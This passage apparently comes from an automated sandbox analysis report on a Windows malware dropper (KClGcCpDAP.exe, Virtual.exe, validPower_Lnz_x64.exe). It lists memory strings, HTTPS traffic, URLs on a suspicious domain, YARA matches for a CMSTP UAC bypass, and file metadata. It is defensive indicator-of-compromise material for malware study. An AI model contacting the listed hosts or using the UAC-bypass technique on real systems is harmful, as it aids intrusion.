                  Source: Virtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.vmware.com/schema/ovf/1/envelope
                  Source: Virtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.vmware.com/specifications/vmdk.html#compressed
                  Source: Virtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.vmware.com/specifications/vmdk.html#sparse
                  Source: Virtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.vmware.com/specifications/vmdk.html#sparsehttp://www.vmware.com/interfaces/specifications
                  Source: validPower_Lnz_x64.exe, 0000000A.00000003.2210919646.00000000004DD000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000003.2219569359.00000000004DD000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2220545140.000000000044F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apokalipo.cyou/
                  Source: validPower_Lnz_x64.exe, 0000000A.00000002.2220545140.000000000044B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apokalipo.cyou/2t2
                  Source: validPower_Lnz_x64.exe, 0000000A.00000003.2219569359.00000000004DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apokalipo.cyou/N
                  Source: validPower_Lnz_x64.exe, 0000000A.00000002.2222475898.0000000002D1F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://apokalipo.cyou/watchvideo-sheila-avis-de-recherche-191280-2770205.html
                  Source: validPower_Lnz_x64.exe, 0000000A.00000002.2222475898.0000000002D76000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://apokalipo.cyou/watchvideo-sheila-avis-de-recherche-191280-2770205.html?xevok9zcbyqunjb=ZzsLL
                  Source: validPower_Lnz_x64.exe, 0000000A.00000002.2222475898.0000000002D1F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://apokalipo.cyou/watchvideo-sheila-avis-de-recherche-191280-2770205.htmleldbZzsLLytC%2FMtKEkDE
                  Source: validPower_Lnz_x64.exe, 0000000A.00000003.2202888428.0000000000482000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000003.2202511556.0000000000485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apokalipo.cyou:443/watchvideo-sheila-avis-de-recherche-191280-2770205.html?xevok9zcbyqunjb=Z
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                  Source: KClGcCpDAP.exe, 00000001.00000002.1728064931.000000006E253000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: https://gnu.org/licenses/
                  Source: KClGcCpDAP.exe, 00000001.00000002.1728064931.000000006E253000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: https://gnu.org/licenses/gpl.html
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49739 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49740 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49741 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49973 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49979 version: TLS 1.2

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 20.2.validPower_Lnz_x64.exe.2671aed.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 12.2.cmd.exe.33907f8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 10.2.validPower_Lnz_x64.exe.264a6ed.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 12.2.cmd.exe.3364a08.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 10.2.validPower_Lnz_x64.exe.2604a20.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 20.2.validPower_Lnz_x64.exe.26726ed.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 20.2.validPower_Lnz_x64.exe.262ca20.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 10.2.validPower_Lnz_x64.exe.2649aed.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeFile deleted: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeJump to behavior
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_008A001D0_2_008A001D
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_008941EA0_2_008941EA
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_008762AA0_2_008762AA
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_008A03D50_2_008A03D5
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_0089C3320_2_0089C332
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_008AA5600_2_008AA560
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_008A07AA0_2_008A07AA
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_0087A8F10_2_0087A8F1
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_008AAA0E0_2_008AAA0E
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_0089FB890_2_0089FB89
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_008A0B6F0_2_008A0B6F
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_008A2C180_2_008A2C18
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_008A2E470_2_008A2E47
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_008AEE7C0_2_008AEE7C
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_00D3001D1_2_00D3001D
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_00D241EA1_2_00D241EA
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_00D062AA1_2_00D062AA
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_00D303D51_2_00D303D5
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_00D2C3321_2_00D2C332
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_00D3A5601_2_00D3A560
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_00D307AA1_2_00D307AA
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_00D0A8F11_2_00D0A8F1
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_00D3AA0E1_2_00D3AA0E
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_00D2FB891_2_00D2FB89
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_00D30B6F1_2_00D30B6F
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_00D32C181_2_00D32C18
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_00D32E471_2_00D32E47
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_00D3EE7C1_2_00D3EE7C
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_6E244F441_2_6E244F44
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_6E244F441_2_6E244F44
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_6E246FA01_2_6E246FA0
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_6E24DD901_2_6E24DD90
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_6E246FA01_2_6E246FA0
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_6E2498911_2_6E249891
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_6E24C9301_2_6E24C930
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_6E2319601_2_6E231960
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_6E23E5B01_2_6E23E5B0
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_6E244F441_2_6E244F44
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_6E2482B01_2_6E2482B0
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_6E2332981_2_6E233298
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_665DE6382_2_665DE638
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_665E56E82_2_665E56E8
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_665E07402_2_665E0740
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_665E47142_2_665E4714
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_665CD46C2_2_665CD46C
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_665D04D02_2_665D04D0
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_665D64B82_2_665D64B8
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_665AE5F82_2_665AE5F8
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_665C95802_2_665C9580
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_665CB5B82_2_665CB5B8
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_665DF2D42_2_665DF2D4
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_665D3E0C2_2_665D3E0C
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_665E3E342_2_665E3E34
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_665D1EF42_2_665D1EF4
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_665CAE882_2_665CAE88
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_665CCD3C2_2_665CCD3C
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_665BDD3C2_2_665BDD3C
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_665DDB682_2_665DDB68
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_665C9B602_2_665C9B60
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_665CA84C2_2_665CA84C
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_665C692C2_2_665C692C
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_6665B6242_2_6665B624
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_6667C6A02_2_6667C6A0
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666506B02_2_666506B0
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666756B82_2_666756B8
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_6666A7602_2_6666A760
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_6667A77C2_2_6667A77C
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_6665D73C2_2_6665D73C
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666AB7E42_2_666AB7E4
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_6666B7C42_2_6666B7C4
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666727AC2_2_666727AC
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_6666F4542_2_6666F454
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_6667A4102_2_6667A410
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666C74DC2_2_666C74DC
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666724D02_2_666724D0
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666644A82_2_666644A8
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666784BC2_2_666784BC
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666BF5582_2_666BF558
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666BE2B82_2_666BE2B8
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666AA2BC2_2_666AA2BC
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666BD2B42_2_666BD2B4
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666702882_2_66670288
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666792942_2_66679294
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_6664B2982_2_6664B298
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_6666C3502_2_6666C350
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666930502_2_66693050
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666C00082_2_666C0008
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_6667A0EC2_2_6667A0EC
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_6664D0E82_2_6664D0E8
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_6667B1E02_2_6667B1E0
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_6666A1F02_2_6666A1F0
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666781942_2_66678194
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_66678E102_2_66678E10
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_6666BE1C2_2_6666BE1C
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_6667AE9C2_2_6667AE9C
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_66697F742_2_66697F74
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_66679F442_2_66679F44
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666BDF5C2_2_666BDF5C
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_66663F102_2_66663F10
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_66679C742_2_66679C74
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_66668CF82_2_66668CF8
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_66674D402_2_66674D40
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_66660DCC2_2_66660DCC
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_66677DB02_2_66677DB0
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_66677AF42_2_66677AF4
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_66669AAC2_2_66669AAC
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_66675A942_2_66675A94
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_66672BF42_2_66672BF4
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666BEBD82_2_666BEBD8
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666ACBA02_2_666ACBA0
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_66675B882_2_66675B88
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666728D42_2_666728D4
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_6664D8B42_2_6664D8B4
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_6665C8942_2_6665C894
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666759582_2_66675958
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_6666A92C2_2_6666A92C
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666649E42_2_666649E4
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: String function: 008B0726 appears 34 times
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: String function: 00871F13 appears 54 times
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: String function: 00873821 appears 500 times
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: String function: 008B0237 appears 685 times
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: String function: 008B32F3 appears 83 times
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: String function: 6E250E68 appears 39 times
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: String function: 6E232BC0 appears 79 times
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: String function: 00D40237 appears 685 times
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: String function: 00D40726 appears 34 times
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: String function: 00D01F13 appears 54 times
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: String function: 00D432F3 appears 83 times
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: String function: 00D03821 appears 500 times
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: String function: 665AF96C appears 38 times
                  Source: validPower_Lnz_x64.exe.4.drStatic PE information: Resource name: ZIP type: Zip archive data (empty)
                  Source: jamulieilmfjkk.4.drStatic PE information: Number of sections : 12 > 10
                  Source: bewwwy.18.drStatic PE information: Number of sections : 12 > 10
                  Source: Ammonium.dll.1.drStatic PE information: Number of sections : 11 > 10
                  Source: KClGcCpDAP.exe, 00000000.00000000.1694797876.00000000008DD000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: \LegalCopyrightCopyright (c) Friarbird. All rights reserved.H OriginalFilenamekwashiorkor.exe@ vs KClGcCpDAP.exe
                  Source: KClGcCpDAP.exe, 00000001.00000000.1698535734.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: \LegalCopyrightCopyright (c) Friarbird. All rights reserved.H OriginalFilenamekwashiorkor.exe@ vs KClGcCpDAP.exe
                  Source: KClGcCpDAP.exe, 00000001.00000002.1728141493.000000006E26A000.00000008.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilenamelibgpg-error.dll" vs KClGcCpDAP.exe
